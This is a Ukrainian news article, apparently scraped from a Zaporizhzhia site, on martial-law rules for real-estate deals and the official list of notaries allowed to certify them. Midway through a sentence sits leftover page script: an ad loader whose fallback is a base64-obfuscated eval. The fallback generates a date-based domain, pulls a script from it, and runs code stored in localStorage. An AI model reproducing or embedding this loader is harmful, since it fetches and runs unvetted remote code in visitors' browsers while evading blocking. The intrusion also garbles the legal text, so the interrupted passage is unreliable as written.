Перелік нотаріусів у Запоріжжі та області, які в умовах воєнного стану можуть вчиняти дії щодо цінного майна

Сфера нерухомості в Україні нещодавно зазнала важливих законодавчих змін: від заборони виконувати будь-які дії з нерухомістю на початку бойових дій, до відкриття реєстрів і навіть поновлення процедури продажу нерухомого майна за дорученням. Також в Україні по-новому врегульовано процес посвідчення угод про купівлю-продаж квартири, будинку чи земельної ділянки.

Оновлене українське законодавство про купівлю-продаж нерухомого майна переважно ґрунтується на тому, що внесено зміни до роботи нотаріусів. Радимо ознайомитись з новими правилами та умовами, введеними в процедуру купівлі-продажу нерухомості відповідно до чинного законодавства.

Місячний мораторій на продаж нерухомості

Якщо ви купили, обміняли чи отримали у подарунок нерухомість, ви не зможете відчужувати це майно протягом місяця з дня, коли відбулася державна реєстрація права власності на нього. Мораторій на швидкий перепродаж нерухомості триватиме до завершення воєнного стану в Україні.

Перелік нотаріусів у Запорізькій області, які мають дозвіл на роботу під час війни

Посвідчувати угоди у сфері нерухомості уповноважені лише нотаріуси, яким держава дала на це право. В Україні створено Перелік нотаріусів, які можуть засвідчувати договори про купівлю-продаж, обмін чи дарування нерухомості під час військового стану. Фахівцям, які не увійшли до цього переліку, виконувати такі дії заборонено.
Розміщено Перелік нотаріусів, якими в умовах воєнного стану вчиняються нотаріальні дії щодо цінного майна, на сайті Міністерства юстиції України.

notarius

Де можна засвідчити договір про купівлю-продаж нерухомості

До червня в Україні діяла заборона на підписання договорів про відчуження нерухомого майна лише за його місцезнаходженням. Тобто, якщо ви продавали квартиру у Львові, посвідчити угоду міг лише нотаріус, який зареєстрував свою діяльність у цьому місті. Тепер це правило скасовано. «Географія» посвідчення угод у сфері нерухомості розширилася навіть до можливості вибирати. Посвідчити договір про купівлю-продаж квартири чи будинку можна за: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

місцем, де знаходиться нерухомість;місцем реєстрації покупця або продавця;місцезнаходженням юридичної особи (якщо купує чи продає нерухомість організація чи установа).

Однак не втратила чинності вимога щодо нотаріуса: зробити це може лише фахівець, який увійшов до розробленого державою Переліку.

Чи можна продати нерухоме майно, яке знаходиться у зоні бойових дій

Тепер — можна. Втім, зауважте: можна продати нерухомість, яка знаходиться на територіях, де ведуться військові дії, що входять до Переліку територій обмеженого доступу.

Посвідчити угоду з купівлі-продажу нерухомого майна, що опинилося в зоні бойових дій, може лише нотаріус, якому це дозволено та його дані внесено до Переліку нотаріусів, якими в умовах воєнного стану вчиняються нотаріальні дії з цінного майна.

Таким чином, основні законодавчі зміни у процедурі купівлі-продажу нерухомості стосуються відчуження нерухомого майна під час війни та пов’язані з правом нотаріуса на посвідчення таких договорів — щодо продажу, обміну чи дарування квартири чи будинку. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/perelik-notariusiv-u-zaporizhzhi-ta-oblasti-yaki-v-umovah-voyennogo-stanu-mozhut-vchinyati-diyi-shhodo-tsinnogo-majna/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top